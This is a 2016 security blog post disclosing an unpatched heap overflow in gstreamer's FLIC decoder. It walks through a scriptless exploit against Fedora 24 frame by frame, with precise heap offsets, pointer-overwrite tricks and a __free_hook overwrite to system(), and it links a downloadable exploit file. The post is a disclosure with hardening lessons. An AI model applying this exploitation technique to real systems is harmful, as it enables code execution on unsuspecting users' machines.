Monday, November 21, 2016

[0day] [exploit] Advancing exploitation: a scriptless 0day exploit against Linux desktops

Overview
A powerful heap corruption vulnerability exists in the gstreamer decoder for the FLIC file format. Presented here is an 0day exploit for this vulnerability.
This decoder is generally present in the default install of modern Linux desktops, including Ubuntu 16.04 and Fedora 24. Gstreamer classifies its decoders as “good”, “bad” or “ugly”. Despite being quite buggy, and not being a format at all necessary on a modern desktop, the FLIC decoder is classified as “good”, almost guaranteeing its presence in default Linux installs.

Thanks to solid ASLR / DEP protections on (some) modern 64-bit Linux installs, and some other challenges, this vulnerability is a real beast to exploit.

Most modern exploits defeat protections such as ASLR and DEP by using some form of scripting to manipulate the environment and make dynamic decisions and calculations to move the exploit forward. In a browser, that script is JavaScript (or ActionScript, etc.). When attacking a kernel from userspace, the “script” is the userspace program. When attacking a TCP stack remotely, the “script” is the program running on the attacker’s computer. In my previous full gstreamer exploit against the NSF decoder, the script was an embedded 6502 machine code program.

But in order to attack the FLIC decoder, there simply isn’t any scripting opportunity. The attacker gets, once, to submit a bunch of scriptless bytes into the decoder, and try and gain code execution without further interaction...

… and good luck with that! Welcome to the world of scriptless exploitation in an ASLR environment. Let’s give it our best shot.

Obligatory screenshot, and downloads
[Screenshot: fedora_flx_exploit.png]

In the above screenshot, we see the exploit file opened using xdg-open from the terminal (which does the same thing as a user clicking on a browser download). The exploit file opens in rhythmbox on Fedora, which is shown, as well as the resultant calculator. The terminal output shows an amusing side effect of the exploit, which we’ll cover later.

The exploit is running against a default install of Fedora 24, except that the gstreamer packages were upgraded to the latest: dnf update gstreamer* (v1.8.3-1.fc24.x86_64). We could have targeted either totem or rhythmbox as the binary to exploit, simply by renaming the file extension of the exploit. totem tends to handle video extensions and rhythmbox audio extensions. We chose .flac for rhythmbox.

This vulnerability applies equally well to Ubuntu 16.04, and probably anything else with gstreamer installed. To get the exploit to work on anything other than the exact Fedora versions noted above, though, you’d need to fiddle with a large number of heap and code offsets in the exploit.

The astute reader will wonder if this exploit might be a full super serious drive by download exploit when paired with my previous Google Chrome and Fedora tracker notes from last week. The answer is sure. If you reworked this exploit to work in the context of the unsandboxed /usr/libexec/tracker-extract process, by fiddling with a few heap offsets etc., you’d have an unpatched drive by download exploit against Chrome + Fedora.

You can download the exploit as demonstrated above from here, or download a fairly minimal crash file to check for the vulnerability here.

Ubuntu vs. Fedora again
Back in 2014, I sandbagged by exploiting Fedora in preference to Ubuntu because Fedora was easier (which we fixed). In this instance, the exact opposite is true: I decided to exploit Fedora because it is much harder. Ubuntu, even in 16.04, has some problems:

  • Missing ASLR on many binaries, including security sensitive ones:
    file /usr/lib/rhythmbox/rhythmbox-metadata
    /usr/lib/rhythmbox/rhythmbox-metadata: ELF 64-bit LSB executable, x86-64
  • Generally little use of RELRO. The Fedora exploit was complicated by having to work around RELRO.

In particular, going after this exploit on Ubuntu would have been much much faster due to the missing ASLR. But the point here is to go after a genuinely scriptless exploit in the presence of solid ASLR. So we choose Fedora as our exploitation target.

The vulnerability
We find the vulnerable decoder code in gst-plugins-good/gst/flx/gstflxdec.c, function flx_decode_delta_fli():

flx_decode_delta_fli (GstFlxDec * flxdec, guchar * data, guchar * dest)
{
...
 /* use last frame for delta */
 memcpy (dest, flxdec->delta_data, flxdec->size);

 start_line = (data[0] + (data[1] << 8));
 lines = (data[2] + (data[3] << 8));
 data += 4;

 /* start position of delta */
 dest += (flxdec->hdr.width * start_line);
 start_p = dest;

 while (lines--) {
   /* packet count */
   packets = *data++;

   while (packets--) {
     /* skip count */
     dest += *data++;

     /* RLE count */
     count = *data++;

     if (count > 0x7f) {
...
     } else {
       /* replicate run */
       while (count--)
         *dest++ = *data++;

The above function is called via a FLX_LC command in the input file. At the time of the call, dest points to the start of the output canvas buffer, e.g. 8 x 8 pixels and always 1 byte per pixel. data points to attacker controlled data from the raw input file.

Unfortunately, it doesn’t take much to see that there’s a complete lack of bounds checking here against the canvas width and height. To get an out-of-bounds write, the attacker simply has to specify a start_line value greater than the number of lines in the output canvas (bug 1). Or they could specify a skip count that goes past the end of the last line of the output canvas (bug 2). Or they could specify a write count that goes past the end of the last line of the output buffer (bug 3) (applies both to the literal run and replicate run code paths).
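
As a rough illustration of what is missing, here is a minimal sketch of the kind of checks one might expect before each write. This is not the upstream fix: the type canvas_t and both helper names are hypothetical, and the canvas is simply modeled as width x height bytes at 1 byte per pixel.

```c
#include <stdbool.h>
#include <stddef.h>

/* Hypothetical model of the output canvas: 1 byte per pixel. */
typedef struct {
  size_t width;
  size_t height;
} canvas_t;

/* Bug 1: start_line must name a line that exists in the canvas. */
static bool start_line_in_bounds(const canvas_t *c, size_t start_line)
{
  return start_line < c->height;
}

/* Bugs 2 and 3: after skipping `skip` bytes from offset `pos`, a run of
 * `count` bytes must still end inside the canvas buffer. */
static bool run_in_bounds(const canvas_t *c, size_t pos, size_t skip,
                          size_t count)
{
  size_t size = c->width * c->height;
  if (pos > size || skip > size - pos)
    return false;
  return count <= size - pos - skip;
}
```

For the 8 x 8 canvas mentioned above, start_line 8 is already rejected, and a run that starts 4 bytes before the end of the buffer may cover at most 4 bytes.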

(Absent a CVE, you can uniquely identify this cluster of issues CESA-2016-0004.)

The constraints and challenges
We’ve identified a very powerful heap overflow primitive, with the following properties:

  • Attacker controls arbitrary number of bytes written, each with an arbitrary value.
  • Non-linear overflow: attacker can “skip over” a bunch of heap to target a precise destination.
  • Attacker controls size of allocation that is overflowed out of, thereby offering some opportunities to control where in the heap it goes.

However, we still need to know what to write out of bounds, which is a challenge without script. Absent any nice piece of data to corrupt, such as a string passed to system(), or a JIT code buffer, we’re going to need to start messing with pointers. And due to the good ASLR, we can’t directly synthesize a valid pointer value.

In order to try and start gaining a bit of control over the exploitation environment, we turn to the rhythmbox media player. This is the default player on the desktop for various audio formats. The rhythmbox / gstreamer combination has some very intriguing (and useful!) properties:

  • No-one really cares about the file extension. So if you put a video file inside a file with an audio file extension, it’ll get processed according to the content and not the file extension.
  • The metadata for a media file is fully scanned, even if it is a video file and not an audio file.
  • rhythmbox does its metadata scanning in a new, fresh subprocess -- rhythmbox-metadata. This results in very clean and predictable heap layouts. Also, if our exploit messes up and crashes, the parent rhythmbox process and UI are largely unaffected.
  • gstreamer decoders typically start off in their own fresh thread, which gets its own fresh thread heap under the modern Linux glibc allocator.

We’ve got enough to fight through without worrying about heap layout, so using rhythmbox to get us a passably deterministic heap setup is a great start.

Unfortunately, using rhythmbox-metadata carries one huge challenge: because it is just extracting metadata from a media file, it runs the decode loop for just 2 frames. If the amount of work we can do per frame turns out to be limited (and it does!), we have very little opportunity to complete an exploit, or rewire the decode loop to run longer.

The exploit: primitives used
We decide to base our exploit around corrupting the metadata object for the actual decoder itself, which is defined thus:

struct _GstFlxDec {
 GstElement element;
 GstPad *sinkpad,*srcpad;
 gboolean active, new_meta;
 guint8 *delta_data, *frame_data;
 GstAdapter *adapter;
 gulong size;
 GstFlxDecState state;
 gint64 frame_time;
 gint64 next_time;
 gint64 duration;
 FlxColorSpaceConverter *converter;
 FlxHeader hdr;
};

This decoder object is typically referenced through a pointer flxdec in the code. Because of the strong heap consistency described above, we’ll typically find a constant offset between the flxdec->frame_data buffer which we are corrupting off the end of, and the flxdec object itself. This means that we can use a fixed value of start_line in the vulnerable flx_decode_delta_fli() function above, and target corruption of specific fields of this object, such as flxdec->converter. Of course, for all this to work, we need the metadata object to be after flxdec->frame_data in the heap. The heap layout is reasonably deterministic for reasons already covered, and different heap layouts can be achieved by changing the input canvas size, or the file extension (which seems to trigger vastly different logic and code paths inside the file format auto detection).
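
To make the targeting arithmetic concrete, the sketch below splits a desired byte distance from the start of the canvas buffer into a start_line value plus a single skip byte. It assumes only the 16-bit start_line and 8-bit skip count visible in the decoder code quoted earlier; the helper name, the struct, and the example distance are made up for illustration and are not taken from the exploit file.

```c
#include <stdbool.h>
#include <stdint.h>

/* Hypothetical helper: express `distance` (bytes past the start of the
 * canvas buffer) as dest += width * start_line, followed by one skip byte. */
typedef struct {
  uint16_t start_line; /* 16-bit field read from the FLX_LC chunk */
  uint8_t skip;        /* skip count of the first packet */
} delta_target_t;

static bool plan_delta_target(uint64_t distance, uint16_t width,
                              delta_target_t *out)
{
  if (width == 0)
    return false;
  uint64_t line = distance / width;
  uint64_t rest = distance % width;
  /* Both values must fit the fields the file format gives us. */
  if (line > UINT16_MAX || rest > UINT8_MAX)
    return false;
  out->start_line = (uint16_t) line;
  out->skip = (uint8_t) rest;
  return true;
}
```

With a width of 8, a distance of 0x1234 becomes start_line 0x246 and a skip of 4. The 16-bit start_line also shows why the reach of the relative write is bounded by the canvas width.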

Trick #1: corrupting the converter field to upgrade to an absolute write primitive
The initial corruption primitive we have is a relative write off the end of an existing heap buffer. On 64-bit, the range is certainly limited such that it is not possible to write earlier in the heap, and writing later in the heap is also subject to some constraints. Given that an exploit needs to dereference fairly arbitrary pointers, we’ll need to upgrade our write primitive. Getting an absolute write primitive is great, but we should note we need some form of ASLR defeat before the absolute write becomes fully powerful.
If we corrupt flxdec->converter, we can subsequently use a FLX_COLOR256 command in the input file. This effectively calls flx_decode_color(), which writes attacker supplied bytes (in multiples of three) to the address flxdec->converter + 8.
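
The address arithmetic for this write can be sketched as follows. The model takes the description above at face value (the write starts at converter + 8 and covers 3 bytes per palette entry); the struct and function names are hypothetical.

```c
#include <stdint.h>

/* Hypothetical model of the FLX_COLOR256 write described above: the write
 * starts at converter + 8 and covers 3 bytes per palette entry. */
typedef struct {
  uint64_t first; /* first byte written */
  uint64_t last;  /* last byte written */
} write_span_t;

/* `entries` is assumed to be at least 1. */
static write_span_t color256_span(uint64_t converter, uint64_t entries)
{
  write_span_t s;
  s.first = converter + 8;
  s.last = s.first + 3 * entries - 1;
  return s;
}

/* To start a write exactly at `target`, aim converter 8 bytes before it. */
static uint64_t converter_for_target(uint64_t target)
{
  return target - 8;
}
```

Under this model, pointing the converter at arena offset 0x280e and writing a single entry touches offsets 0x2816 through 0x2818, so the last byte lands on the least significant byte of the function pointer at 0x2818 that trick #3 goes after.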

Trick #2: awesomely useful 3-byte partial pointer overwrite within thread heap arena
On modern glibc, malloc() on a thread will return heap chunks from a per-thread heap arena. This heap arena has very strong alignment of 64MB on 64-bit. A typical thread heap start address might be 0x7fffa8000000. This strong alignment is very useful for partial pointer overwrites. Fully 3 bytes can be overwritten without having to worry about differing alignments. In the case of the exploit, the flxdec->converter pointer is partially overwritten so that it points early in the thread heap arena to corrupt a function pointer.
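
A small sketch of the pointer arithmetic, assuming a little-endian 64-bit target. The example pointer value is invented; only the 64MB alignment and the sample arena base come from the text above.

```c
#include <stdint.h>

#define ARENA_ALIGN (64ULL * 1024 * 1024) /* 64MB thread arena alignment */

/* Replace the low 3 bytes of `ptr` with `low24`, as a little-endian
 * overflow of 3 bytes onto the stored pointer would. */
static uint64_t overwrite_low3(uint64_t ptr, uint32_t low24)
{
  return (ptr & ~0xffffffULL) | (low24 & 0xffffffu);
}

/* Start of the 64MB-aligned arena that contains `ptr`. */
static uint64_t arena_base(uint64_t ptr)
{
  return ptr & ~(ARENA_ALIGN - 1);
}
```

For a pointer such as 0x7fffa803a5c0, overwriting the low 3 bytes with 0x00280e gives 0x7fffa800280e, which is arena base + 0x280e on every run. Note that 3 bytes only cover 16MB, so this relies on the original pointer sitting in the first 16MB of the arena; the offsets used in this exploit are all far below that.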

Trick #3: single byte partial pointer overwrite of a function pointer
In the exploit, there’s a function pointer at thread heap arena offset 0x002818, gst_list_iterator_resync(). Linux ASLR places code with page level granularity, and this particular pointer value ends in 0x6f0 within a page. Determinism can be retained by corrupting the single least significant byte, but no more. As it happens, at offset 0x6e8 (accessible via a single byte corruption), there is the code:

 xor  %eax,%eax
 retq

We use that little gadget to force the decoder loop to continue indefinitely, earlier in the exploit.
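
The single byte case can be sketched the same way. The full pointer value below is invented; only the in-page offsets 0x6f0 and 0x6e8 come from the text, and 4KB pages are assumed.

```c
#include <stdint.h>

#define PAGE_SIZE_BYTES 0x1000ULL /* assumed 4KB pages */

/* Replace only the least significant byte of a code pointer. */
static uint64_t overwrite_low1(uint64_t ptr, uint8_t low8)
{
  return (ptr & ~0xffULL) | low8;
}

/* Offset of an address within its 4KB page; ASLR leaves this unchanged. */
static uint64_t page_offset(uint64_t ptr)
{
  return ptr & (PAGE_SIZE_BYTES - 1);
}
```

Writing the byte 0xe8 over a pointer that ends in 0x6f0 moves it back by exactly 8 bytes, wherever the library was loaded. A 2 byte overwrite would also have to guess the 4 randomized bits just above the page offset, which is why one byte is the limit here.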

Trick #4: locating a copy primitive
Being able to perform partial pointer overwrites only is no fun because it will mostly limit us to exploring and corrupting within thread heap arenas. What we’d really like is a copy primitive so that we can read a pointer value and then write it somewhere out of bounds. After a bit of code study, we do see such a primitive in the decode loop. First, the read:

flx_decode_delta_fli (GstFlxDec * flxdec, guchar * data, guchar * dest)
{
...
 /* use last frame for delta */
 memcpy (dest, flxdec->delta_data, flxdec->size);

We can corrupt flxdec->delta_data (either a full overwrite, or a partial pointer overwrite) and therefore read from various interesting memory locations. flx_decode_delta_fli() can be called as many times as we want per frame, via multiple FLX_LC commands. Results of the read are placed in flxdec->frame_data.

And the write:

gst_flxdec_chain() {
        /* decode chunks */
         flx_decode_chunks (flxdec,
             ((FlxFrameType *) chunk)->chunks,
             chunk + FlxFrameTypeSize, flxdec->frame_data);

         /* save copy of the current frame for possible delta. */
         memcpy (flxdec->delta_data, flxdec->frame_data, flxdec->size);

This memcpy() is a write of the content we previously read into flxdec->frame_data. This content is written to flxdec->delta_data, another pointer we can corrupt to point to where we want. Unfortunately, this write only fires once per frame, at the end, and as we covered earlier, we have a frame budget of 2! Together, this read and write are a decent copy primitive. We should be able to use it to chase pointer chains.
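
Stripped of everything else, the copy primitive looks roughly like the toy model below. The struct is a hypothetical stand-in that keeps only the three decoder fields involved, and the pointer "corruption" is done by plain assignment rather than through the overflow.

```c
#include <stdint.h>
#include <string.h>

/* Hypothetical stand-in for the three decoder fields the copy uses. */
typedef struct {
  uint8_t *delta_data;
  uint8_t *frame_data;
  size_t size;
} toy_dec_t;

/* Models the memcpy() at the top of flx_decode_delta_fli(). */
static void toy_read_step(toy_dec_t *d)
{
  memcpy(d->frame_data, d->delta_data, d->size);
}

/* Models the end-of-frame memcpy() in gst_flxdec_chain(). */
static void toy_frame_tick(toy_dec_t *d)
{
  memcpy(d->delta_data, d->frame_data, d->size);
}

/* Copy `size` bytes from src to dst by redirecting delta_data twice. */
static void toy_copy(toy_dec_t *d, uint8_t *src, uint8_t *dst)
{
  d->delta_data = src; /* corrupted pointer: read source */
  toy_read_step(d);
  d->delta_data = dst; /* corrupted again: write destination */
  toy_frame_tick(d);
}
```

The value passes through frame_data on its way from source to destination, so the file never needs to contain it. In the real decoder the second half only happens once per frame, which is the budget problem noted above.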

Trick #5: corrupting the input file buffer
This trick is pretty neat as it enables us to do more inside our budget of 2 frames. We can use our copy primitive to copy a bunch of pointers and write them into the buffer containing the input file. We can then further corrupt the input file buffer, in the spaces in between the pointers we just copied, to create commands that effectively write real pointer values to useful locations.
We also use this trick in the exploit, to restore flxdec->delta_data. After corrupting it to chase a chain of pointers, we need to put it back, otherwise we’ve lost control of it via partial pointer overwrites. In order to put it back, we write its original value into the input file buffer.

Trick #6: co-opting an addition primitive
This is my favorite trick used! By far! While the ability to copy pointers around cleanly is very useful, it is rarely going to be sufficient. For example, when building a ROP chain, we’d typically leak a pointer into a code section, such as a function pointer, and then calculate the address of useful opcode sequences based on addition to the leaked pointer. Or, if we want to mess with a GOT entry, it typically isn’t a simple pointer copy, but a read / add / write sequence.
So how can we get an addition primitive going without script?
It turns out that the decoder maintains time from frame to frame, and it does it like this, continuing on from the gst_flxdec_chain() code quoted above:

         /* save copy of the current frame for possible delta. */
         memcpy (flxdec->delta_data, flxdec->frame_data, flxdec->size);

         gst_buffer_map (out, &map, GST_MAP_WRITE);
         /* convert current frame. */
         flx_colorspace_convert (flxdec->converter, flxdec->frame_data,
             map.data);
         gst_buffer_unmap (out, &map);

         GST_BUFFER_TIMESTAMP (out) = flxdec->next_time;
         flxdec->next_time += flxdec->frame_time;

This is super cool: we can co-opt that frame time calculation to instead be an addition of a constant of our choosing to a pointer. We just have to copy a pointer into flxdec->frame_time and write the addition constant to flxdec->next_time. When the next frame starts, a new calculated pointer will be present in flxdec->next_time and we can again use our copy primitive to put it somewhere useful.
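
As a toy model of the addition primitive: the struct below is a hypothetical stand-in for the two timing fields, and unsigned 64-bit integers are used in place of gint64 so that wraparound is well defined in C.

```c
#include <stdint.h>

/* Hypothetical stand-in for the two timing fields. The real fields are
 * gint64; unsigned 64-bit is used here so wraparound is well defined. */
typedef struct {
  uint64_t frame_time;
  uint64_t next_time;
} toy_clock_t;

/* Models `flxdec->next_time += flxdec->frame_time` at frame tick. */
static void toy_tick(toy_clock_t *c)
{
  c->next_time += c->frame_time;
}

/* Add `constant` to `leaked` using only the tick. */
static uint64_t toy_add(uint64_t leaked, uint64_t constant)
{
  toy_clock_t c;
  c.frame_time = leaked;  /* placed by the copy primitive */
  c.next_time = constant; /* written directly from the file */
  toy_tick(&c);
  return c.next_time;
}
```

Addition is commutative, so it does not matter which of the two fields receives the leaked pointer and which receives the constant; the result always ends up in next_time.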

The exploit: frame-by-frame
With detailed study into primitives available, we’re now in a position to link a bunch of them together to get an exploit going, no script required ;-) We’ll break things down into the actions taken each frame. If things look a little bit busy in the first couple of frames, don’t be surprised. Remember, we have just 2 frames to do something drastic to cause the decoder to continue into further frames.

Frame 1
  • Use FLX_LC to do a 3 byte partial pointer overwrite on flxdec->converter; point it to offset 0x280e into thread heap arena.
  • Use FLX_COLOR256 to do a 1 byte partial pointer overwrite on a gst_list_iterator_resync() pointer; point it to a gadget that does “return 0”.
  • FLX_LC; point flxdec->converter to offset 0x2830.
  • FLX_COLOR256; 3 byte partial pointer overwrite of existing pointer into thread heap arena, make it point to offset 0x24100, which is a GstPad object.
  • FLX_LC; point flxdec->converter to offset 0x2840.
  • FLX_COLOR256; 3 byte partial pointer overwrite of existing pointer into thread heap arena, make it point to offset 0x24100, which is a GstPad object.
  • FLX_LC; point flxdec->converter to offset 0x2824.
  • FLX_COLOR256; write 12 bytes of FLIC protocol in between pointers we just corrupted, to form a chunk of input file.
  • FLX_LC; point flxdec->converter to offset 0x2837.
  • FLX_COLOR256; write 9 bytes of FLIC protocol in between pointers we just corrupted, to form a chunk of input file.
  • FLX_LC; point flxdec->converter to offset 0x3a118. This is actually inside the flxdec object and is guaranteed to be a string of 8 zeros. This is necessary to prevent the converter from being used (and crashing) at end of frame.
  • FLX_LC; 3 byte partial pointer overwrite to point flxdec->delta_data to offset 0x2818.
  • FLX_LC; no-op to set flxdec->size to 56, but it is already 56. This is a relic from an earlier version of the exploit.
  • FLX_LC; point flxdec->delta_data to offset 0x3cb68. This is inside the input file buffer.
  • Allow frame tick.
  • Copy primitive is invoked: the last FLX_LC reads 56 bytes at thread heap arena offset 0x2818 into flxdec->frame_data. And then the frame tick copies those 56 bytes from flxdec->frame_data to flxdec->delta_data, which points to the input buffer. We just copied a chunk of program, with 3 embedded pointer values, to the input buffer.

Frame 2
  • FLX_LC; point flxdec->converter to offset 0x240f6, which is just before a GstPad object that we want to corrupt. This object controls whether decoding continues or not.
  • FLX_COLOR256; no-op, just to get the alignment of the input file right.
  • FLX_COLOR256; copy a few bits to corrupt the GstPad, including copying the “return 0” function pointer gadget on top of GstPad::chainfunc. This value is not in the original input file, and only placed there by the input buffer corruption in frame 1 above.
  • FLX_COLOR256; copy a few more bits to corrupt the GstPad, including replacing GstPad::peer and GstPad::parent with pointers to the GstPad itself. Again, these values are not in the original input file, and only placed there by the input buffer corruption in frame 1 above.
  • FLX_LC; set flxdec->size to 8. Maybe superfluous.
  • FLX_LC; set flxdec->converter to offset 0x24128, which is inside the GstPad object we are busy corrupting and faking.
  • FLX_COLOR256; write the value 0, this effectively sets GstPad::flags to 0.
  • FLX_LC; set flxdec->converter to offset 0x241c8, which is inside the GstPad object.
  • FLX_COLOR256; write the value 1, this effectively sets GstPad::mode to GST_PAD_MODE_PUSH.
  • FLX_LC; set flxdec->converter to offset 0x242d0, which is inside the GstPad object.
  • FLX_COLOR256; write the value 0, this effectively sets GstPad::num_probes to 0.
  • FLX_LC; set flxdec->converter to offset 0x3a118, which is a safe place for frame tick as per frame 1.
  • FLX_LC; set flxdec->delta_data to offset 0x24128, which is a read of GstPad::parent (which we set to point to the GstPad itself, at offset 0x24100).
  • FLX_LC; set flxdec->delta_data to offset 0x3a110, which is flxdec->srcpad.
  • Allow frame tick, which copies the value of the GstPad pointer into flxdec->srcpad.

Right here is a critical time in the exploit. We need to have corrupted enough of the gstreamer decoder state to prevent the decode loop from stopping. The key code line to cause continuation is here in gstflxdec.c:

        res = gst_pad_push (flxdec->srcpad, out);
We need this to return GST_FLOW_OK (0). It succeeds because we’ve pointed flxdec->srcpad to a thoroughly hacked up GstPad, which streamlines code flow through gst_pad_push(), to return 0 as easily as possible. In the end it wasn’t that easy -- various pointers are chased even during the simplest code path, and a function pointer is called, even when you clear all the flags and special status variables. We eventually win the “return 0” when flxdec->srcpad->peer->chainfunc is called, which we set to our special gadget we created with a partial function pointer overwrite.

Frame 3
Things are a bit more sane now. We can do a simpler amount of work per frame tick without having to worry about running out of frame ticks. We can use the copy / addition primitive available at frame tick as many times as necessary.
  • FLX_LC; set flxdec->name to offset 0x3a148, which now points to flxdec->frame_time. flxdec->name is not special in the code, it’s just a convenient place to build and store a derived pointer value for later use.
  • FLX_LC; set flxdec->delta_data to offset 0x3a020, which points to flxdec->name.
  • FLX_LC; set flxdec->delta_data to offset 0x3cf4a, which is inside the input file buffer.
  • Frame tick: copies from flxdec->name, which contains the value &flxdec->frame_time, to a point in the input file buffer; we’ll need it later.

Frame 4
  • FLX_LC; set flxdec->next_time to the 8 byte value 0x140, which is a constant we want our addition engine to add.
  • FLX_LC; set flxdec->delta_data to offset 0x3a108, which will cause a read of flxdec->sinkpad.
  • FLX_LC; set flxdec->delta_data to offset 0x3a148, which is &flxdec->frame_time.
  • Frame tick: copies flxdec->sinkpad to flxdec->frame_time, which is then added to flxdec->next_time, leaving flxdec->sinkpad + 0x140 in flxdec->next_time.

Frame 5
  • FLX_LC; set flxdec->delta_data to offset 0x3a150, which is a read of flxdec->next_time, or our calculated pointer value.
  • FLX_LC; set flxdec->delta_data to offset 0x3c8b0, which is a saving of our calculated pointer value toward the beginning of the input file buffer. Also useful for debugging.
  • Frame tick, already explained.

Frame 6
  • FLX_LC; read the saved calculated pointer value at offset 0x3c8b0.
  • FLX_LC; write it to offset 0x3a120, which is flxdec->delta_data.
  • Frame tick, already explained.

Frame 7
  • FLX_LC; reads from flxdec->delta_data which currently points to flxdec->sinkpad + 0x140. This reads the value of a gst_flxdec_chain() function pointer.
  • FLX_COLOR256; writes the pointer value that we wrote into the input file buffer in frame 3 above, which is &flxdec->frame_time. Writes it to flxdec->delta_data, restoring it. Until we restored it, it pointed outside of the thread heap arena, so the partial pointer overwrites that we’ve been using were broken until we just restored it.
  • Frame tick: writes the value of the gst_flxdec_chain() function pointer to flxdec->frame_time.

Frame 8
  • FLX_LC; writes 8 byte pointer offset value 0x202f70 to flxdec->next_time.
  • Frame tick: addition! Leaves gst_flxdec_chain() + 0x202f70 in flxdec->next_time. This is the read only address of the memcpy() GOT entry.

Frame 9
  • FLX_LC; points flxdec->delta_data to &flxdec->next_time, for read of calculation result.
  • FLX_LC; points flxdec->delta_data to offset 0x3c8c0, a place in the input file buffer, to write the calculation result at frame tick time.
  • Frame tick, already explained.

Frame 10
  • FLX_LC; set flxdec->name to offset 0x3a148, which now points to flxdec->frame_time. (Can’t convince myself this is still necessary -- I don’t think the value changed since we set it to the same value in frame 3).
  • FLX_LC; set flxdec->delta_data to offset 0x3a020, which points to flxdec->name.
  • FLX_LC; set flxdec->delta_data to offset 0x3d1ca, which is inside the input file buffer.
  • Frame tick: copies from flxdec->name, which contains the value &flxdec->frame_time, to a point in the input file buffer; we’ll need it later.

Frame 11
  • FLX_LC; point flxdec->delta_data to read from offset 0x3c8c0, which is where we stashed the GOT address of the memcpy() function pointer in frame 9.
  • FLX_LC; point flxdec->delta_data to write to flxdec->delta_data at frame tick. Writes the GOT address of memcpy() to flxdec->delta_data.
  • Frame tick, already explained.

Frame 12
  • FLX_LC; reads from flxdec->delta_data, effectively reading the memcpy() function pointer value into flxdec->frame_data.
  • FLX_COLOR256; writes the pointer value that we wrote into the input file buffer in frame 10 above, which is &flxdec->frame_time. Writes it to flxdec->delta_data, restoring it.
  • Frame tick: writes the value of the memcpy() function pointer to flxdec->frame_time.

Frame 13
  • FLX_LC; writes 8 byte pointer offset value 0xffffffffffef91c0 to flxdec->next_time.
  • Frame tick: addition! Leaves memcpy() + 0xffffffffffef91c0 in flxdec->next_time. This is effectively a subtraction, calculating the address of system().
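
The large constant is just the two's complement of 0x106e40, so adding it modulo 2^64 moves the pointer down by that many bytes. A minimal sketch of the conversion in both directions follows; the helper names are hypothetical.

```c
#include <stdint.h>

/* Constant that, when added modulo 2^64, subtracts `distance`. */
static uint64_t add_constant_for_subtract(uint64_t distance)
{
  return (uint64_t) 0 - distance;
}

/* Distance that a wrapped addition constant effectively subtracts. */
static uint64_t distance_for_constant(uint64_t constant)
{
  return (uint64_t) 0 - constant;
}
```

This is how an add-only primitive can still reach targets below the leaked pointer. The distance itself is specific to the exact glibc build being attacked.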

Frame 14
  • Abbreviating a bit harder now. Read the result in flxdec->next_time and write it to offset 0x3c8d0, which is a useful storage location in the input file buffer.

Frame 15
  • Read the stored system() value at offset 0x3c8d0, and write it to flxdec->frame_time.

Frame 16
  • Write pointer offset value 0x37b840 into flxdec->next_time, and use frame tick to add it to system(). The result is 8 bytes before __free_hook in the glibc BSS. (We use 8 bytes before because we’re going to do a write through flxdec->converter, which writes at an offset of positive 8 bytes.)

Frame 17
  • Read the resulting value from flxdec->next_time and stash it safely away at offset 0x3c8e0, a useful storage location in the input file buffer.

Frame 18
  • Read the stashed __free_hook - 8 address value at offset 0x3c8e0, and write it at offset 0x3d60a, which is further forward into the input file buffer.

Frame 19
  • Read the stashed system() value at offset 0x3c8d0, and write it at offset 0x3d62a, which is further forward into the input file buffer.

Frame 20
  • FLX_LC; point flxdec->converter to offset 0x39808, which is the value of the local pointer chunk in the decode loop.
  • FLX_COLOR256; write the string “gnome-calculator”.
  • FLX_LC; point flxdec->converter to &flxdec->converter - 8.
  • FLX_COLOR256; write over flxdec->converter. The value written is the pointer value written into the input file buffer in frame 18, which is __free_hook - 8. The next FLX_COLOR256 will therefore write over __free_hook.
  • FLX_COLOR256; write system() on top of __free_hook. We get system() from the input file buffer, where we wrote it in frame 19.

At this point, the decode loop will run free(chunk), causing the free hook to be called. Since the free hook is system(), and the contents of chunk is gnome-calculator, then we get a calculator. Win! As a side effect, tons of calls are made to system() as the rest of the process frees memory. Sometimes, there are side effects as the shell proceeds to interpret the content of heap chunks :-)
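
The final step can be modeled without touching glibc at all. In the toy below, toy_free_hook is a hypothetical stand-in for __free_hook with a simplified one-argument signature, and toy_system only records its argument instead of running a command.

```c
#include <stddef.h>
#include <string.h>

/* Hypothetical hook variable standing in for glibc's __free_hook. */
static void (*toy_free_hook)(void *ptr) = NULL;

/* Records what the "hook" was called with, instead of running a command. */
static char toy_last_command[64];

static void toy_system(void *ptr)
{
  strncpy(toy_last_command, (const char *) ptr,
          sizeof(toy_last_command) - 1);
  toy_last_command[sizeof(toy_last_command) - 1] = '\0';
}

/* Models free(): if a hook is installed, it receives the chunk pointer. */
static void toy_free(void *ptr)
{
  if (toy_free_hook != NULL) {
    toy_free_hook(ptr);
    return;
  }
  /* a real allocator would release the chunk here */
}
```

Once the hook points at the system() stand-in, freeing a chunk whose contents are the string gnome-calculator hands that string to it as the first argument. Every later free in the process does the same with whatever its chunk contains, which matches the noisy side effect described above.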

Closing notes
This was a fairly ridiculous exploit. But it was worth doing because it’s proof that scriptless exploits are possible, even within the context of decent 64-bit ASLR. It was possible to commandeer memory reads, writes and even additions within the decoder loop to slowly but surely advance the exploit and gain control.

There are definitely some specific lessons to learn regarding Linux desktop security:

  • Ubuntu has problems with missing defenses such as ASLR, RELRO, etc., even in the latest 16.04 LTS release.
  • The elevation of the FLIC format decoder into the gstreamer “good” plugins set was probably a mistake.
  • More generally, the partitioning of gstreamer decoders into “good”, “bad” and “ugly” makes sense on some levels, but not for security. For security, a partition of “useful” vs. “obscure” might make more sense. The obscure codecs only provide risk -- I’d recommend even removing the automatic UI (accessed by e.g. totem) for installing obscure codecs, because it’s not as if standard users need them unless they are under attack.
  • The final exploit primitive was the corruption of the __free_hook glibc variable. We had to go after a variable like this because on Fedora, the GOT function pointers are read only, and… we don’t like ROP, right? :-) It’s worth noting that other critical function pointers are protected within glibc. For example, both the atexit() and tls_dtor_list function pointers are protected by xor’ing with a “secret”. By the same underlying reasoning, __free_hook is probably attackable enough that it should be similarly protected. The value of doing so against an arbitrary read / write primitive is however debatable.
  • Code that automatically indexes or thumbnails media files really needs to be sandboxed in this day and age.


13 comments:

Sanjuro said...

ty

wily said...

badass.

Anonymous said...

Thanks, this blog entry was very well written, as non-coder admin like me could catch it on.

Robert said...

On Fedora 25, tracker-extract crashed after downloading the file :)

ubuntusysadmin said...

Worth mentioning what an incredible piece of work this entire exploit is.

antikythera said...

Have you tested this against gstreamer1 build 1.10.0-1.fc25? just curious as to whether the same applies.

Unknown said...

Can the same approach be applied to the GPU video decoding as well to bypass from user level to the 0 ring system level directly?

Anonymous said...

